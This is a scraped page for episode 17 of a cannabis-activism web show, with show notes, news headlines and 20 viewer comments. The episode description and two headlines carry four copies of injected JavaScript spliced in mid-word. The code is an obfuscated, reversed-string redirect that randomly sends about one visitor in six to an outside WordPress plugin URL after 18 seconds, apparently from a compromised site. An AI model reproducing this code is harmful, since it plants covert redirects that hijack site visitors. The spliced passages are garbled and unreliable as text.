The THC Show with Neil Magnuson – Episode 17

The THC Show with Neil Magnuson – Episode 17

POT TV – The THC Show with Neil Magnuson – Episode 17.

TUNE IN LIVE every Tuesday at 4pm pt on Pot.TV!

Cannabis activist Neil Magnuson offers truth, hope and change LIVE at 4pm pt.

Neil reads the headlines.

He follows up with the legal battle of compassion club operatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor Jerry Martin’s constitutional challenge. He also keeps you up toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to date on the Cannabis Substitution Project and upcoming cannabis events.

Neil’s guest this week is Freddie Pritchard.

Neil marks 420 with Glenn Wells from CannaMatch.

Show notes:

*Additional footage courtesy of Debbie Hellion

Dispensary raids

Study: CBD From Marijuana Plus Chemotherapy Tripled Cancer Survival Rates In Mice

New research suggests daily cannabis use could be effective alternative toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to opioids for chronic pain

Gabapentin Linked toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Growing Number of Suicide Attempts

WHO Report Finds No Public Health Risks Or Abuse Potential For CBD

Medical marijuana study

Don Davies blasts HESA committee

Youtube Channel

20 thoughts on “The THC Show with Neil Magnuson – Episode 17”

  1. Al Ohm says:

    First: Freddie is a rock star. Second, I was not a big fan of Neil for what he just admitted: and I have huge respect for him now. This format of advocates and real talk about issues and reality is desperately needed. Thank you. Great work, not just tonight but always. Keep up the great work. I am in no way an authority, just sharing my observations. Speak truth to power, free the weed and heal the nations.

  2. ytfp Chris says:

    Really great intro. I have to say that it is really sad that these fine men and women who the majority in there hearts joined the force to do the right thing and to help people and stop the bad guys have had their hearts and minds hijacked to be providing muscle for what really amounts to racketeering.

  3. ytfp Chris says:

    Getting a wooshing whipering high pitch background echo on this audio on what seems like a seperate track.
    Also although Gabapentin can mimic some effects and effect the mood like stated, its not an opiod it does effect GABA but it does not bind to opiate receptors.

  4. Harmony Smurf says:

    so disappointing to see democracy and human rights being ignored in Canada. Don't run because they will follow you(assuming you aren't fleeing to a medical state for your well being). Everyone needs to fight for everyone's freedom wherever you live! Get angry and let your reps, mayors, and council person know that what they are doing is unacceptable. And while you are at it, tell them they need to show some accountability for the missing first nations women! (BTW, I am canadian heritage that lives in the USA, but I still care about injustice wherever it occurs)

  5. CHONGED says:

    Free the weed …..great show as always….great work ….keep them comin……

  6. CHONGED says:

    Wonder what the taxpayers bill is for all those raids ……

  7. Roger Colette says:

    Great Show ! Thank You !

  8. Roger Colette says:

    i learn so much from the THC Show ! 🙂

  9. eric bryant says:

    Neil is a real voice of reason I like everyone at pot tv but I have to have my bias Neil is my favorite

  10. Otto Nomicus says:

    Why are you concerned about high prices when you're allowed to grow it yourself? Producing quality cannabis is not quite as easy as producing corn. You can't do it, can ya. You seem to think that because it's a plant it's as easy to produce as hay. Maybe hemp, yerah, but not drug cannabis of any quality. Is Washington or Colorado weed any good? No it is not, it's garbage because it's mostly grown outdoors in a northern climate and never ripens. Quality weed requires 15-16 weeks of flowering. I'm sure everybody you know in BC who considers themselves good growers THINK weed ripens in 8-10 weeks, but that's because they never saw a ripe cannabis plant their lives, much less smoked any other than imported from equatorial regions. Virtually no commercial grower flowers longer than 10 weeks and most even less.

    There's no comparison between 8-10 week weed and 15-16 week weed, obviously, since it's only halfway to maturity. Forget about your silly magnifiers and looking at trichomes, because ain't a chance in hell your weed is ripe before 15 weeks just because trichs look a certain way. Weed doesn't even start getting smokable until at least 14 weeks and really the second half of week 15 before it's satisfactory. 16 is best but budrot can be an issue so 15 is a good compromise, but 10 is a fucking joke and 8 is just fucking stupid. And then it needs to be cleaned down properly, which is very labor intensive, and cured and dried properly. And is weed cheap in Amsterdam? No, it's expensive as hell, so why should it be cheap in Canada? It's actually under priced right now based on the work and skill involved.

  11. Chili Bu Revolution says:

    great show folks!

    sadly I keep seeing folks bicker among themselves due to this or that flavour of poli-tricks being the reason the powers that be's legalization farce is what it is and simply put that is not the case…

    … people need to pull their heads out of their ass' as they keep the farce alive by feeding into the false dichotomy that one flavour of political party is better then the other,

    matters not the flavour placed in power by their corpoRATe overlords..the song remians the same across the planet when it comes to legal-LIES-ation….

    the plan was and is to 'control, restrict and regulate' this plant all the while keeping the masses at odds with one another which is obviously been a success,

    people need to band together regardless of whichever pol-LIE-tician floats their boat… is literally us VS them,

    get over your political hangups and fight the good fight for #truecannabisfreedoms instead of being a useful idiot!

    bless up and never stop 0vergrowing a failing, greed based system!
    #freetheweed to #endthegreed so everyone, everywhere #plantsomeseeds

  12. Roger Colette says:

    again i enjoy this show thank you Neil. and Pot TV . I Learn So Much I never knew Neil If You Ever Need My Help In Anyway ! I'll Be There email me i'll give my phone# Your A Great Man in My Eyes 'And Was 10 Years Ago When I First Met You . Your Friend Roger . Let Me Help If I Can ! 🙂 Thank You .

  13. Roger Colette says:

    Oh And Thank You Freddie ! For Standing Up For Whats Right. Free The Weed ! …..

  14. Roger Colette says:

    right on

  15. Roger Colette says:

    again right on ! Thank you Freddy !

  16. Roger Colette says:

    Its a beautiful thing. to see how it helps so much ! the sick !

  17. Roger Colette says:

    right on free the weed !

  18. Roger Colette says:

    people need to see these show to hear what going on . thank you pot TV & Neil !

  19. Roger Colette says:

    again great show . telling as it it . 4 times i looked at this show and i may look at it again ! 🙂

  20. Mark Luxton says:

    Rights can not be taken away. Only violated and ignored. Revolution is not physical fighting. FYI

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